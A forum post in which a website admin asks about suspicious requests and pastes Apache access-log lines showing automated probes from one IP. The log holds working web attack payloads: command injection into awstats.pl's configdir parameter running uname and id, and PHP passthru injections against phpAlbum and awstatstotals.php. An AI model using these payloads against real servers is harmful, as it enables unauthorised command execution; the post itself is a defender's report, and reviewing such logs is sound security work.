Hi! Thanks for the great updated EQdkp system! Anyway, I adding our raid and items today and noticed one client being in weird address when browsing Admin Index, shown in image below. I googled the IP and it seems to be from Taiwan. No one in our guild is from there, or even close :p I also tried that myself and I could browse the site in /stats/ folder, even tho it does not exist in my server. Not really sure what's going on.. Also, what the heck is awstats.pl?
If the image does not show up, someone from 203.72.59.6 was browsing "/stats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo|" in my EQdkp-Plus site. I guess he's trying to print usernames/ids? Any ideas if I should be worried?
edit: checked apache access.log, adding it below
Code:
203.72.59.6 - - [04/Dec/2011:20:42:01 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:05 +0200] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 200 69423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:07 +0200] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:10 +0200] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:10 +0200] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
Thanks,
moz
